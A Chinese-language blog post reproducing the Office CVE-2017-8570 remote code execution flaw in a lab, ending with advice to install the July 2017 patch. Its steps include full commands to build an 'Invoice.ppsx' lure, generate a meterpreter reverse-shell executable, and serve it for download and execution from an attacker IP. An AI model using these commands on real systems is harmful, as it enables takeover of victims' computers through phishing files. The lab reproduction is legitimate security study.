天天看點

Office 遠端代碼執行漏洞(CVE-2017-8570)複現

【漏洞詳情】

  • Office一直是主流的辦公軟體,當 Microsoft Office 軟體無法正确處理記憶體中的對象時,其中存在遠端執行代碼漏洞。成功利用此漏洞的攻擊者可以使用經特殊設計的檔案在目前使用者的安全上下文中執行操作。CVE-2017-8570這個漏洞影響office所有發行版本,當使用者不經意點選了我們的惡意PPSX檔案,那麼我們就可以直接擷取到他的使用者權限,危害性十分高。

【驗證詳情】

  • 影響版本

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2 (32-bit editions)

Microsoft Office 2010 Service Pack 2 (64-bit editions)

Microsoft Office 2013 RT Service Pack 1

Microsoft Office 2013 Service Pack 1 (32-bit editions)

Microsoft Office 2013 Service Pack 1 (64-bit editions)

Microsoft Office 2016 (32-bit edition)

Microsoft Office 2016 (64-bit edition)

  • 驗證過程

  • 1.這裡使用的是Windows2007 sp1作為我的靶機,接着使用meatasploit工具進行漏洞複現。
  • 2.首先從網上下載下傳CVE-2017-8570漏洞exp到本地目錄:

git clone https://github.com/tezukanice/Office8570.git

Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 3.切換到Office8570目錄下,然後建立目錄,将原本已有的ppsx檔案另存到template。
Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 4.生成惡意的PPSX檔案到本地,使用指令如下,這裡的IP是kali的IP:

python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.233.132/logo.doc

Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 5.使用windows的meterpreter的反彈木馬生成反彈shell的exe檔案。

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.233.132 LPORT=6666 -f exe > shell.exe

Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 6.設定監聽,用于在80端口監聽,等待惡意ppsx檔案的執行,繼而接收ppsx請求來下載下傳執行kali本地反彈木馬shell。

python cve-2017-8570_toolkit.py -M exp -e http://192.168.233.132/shell.exe -l shell.exe

Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 7.打開metasploit工具,使用multi/handler加載攻擊子產品,設定監聽。
Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 8.将我們剛才生成的惡意的ppsx檔案放在目标主機上執行,這裡就是模拟使用者點選黑客發送的惡意檔案。
Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 9.點選運作Invoce.ppsx檔案。
Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 10.檢視是否接收到目标機發送的擷取payload的請求,可見接收成功:
Office 遠端代碼執行漏洞(CVE-2017-8570)複現
  • 11.檢視MSF狀态,已經獲得shell。
Office 遠端代碼執行漏洞(CVE-2017-8570)複現

【防禦方式】

  • 及時安裝微軟2017年7月釋出的最新更新檔

    https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570

繼續閱讀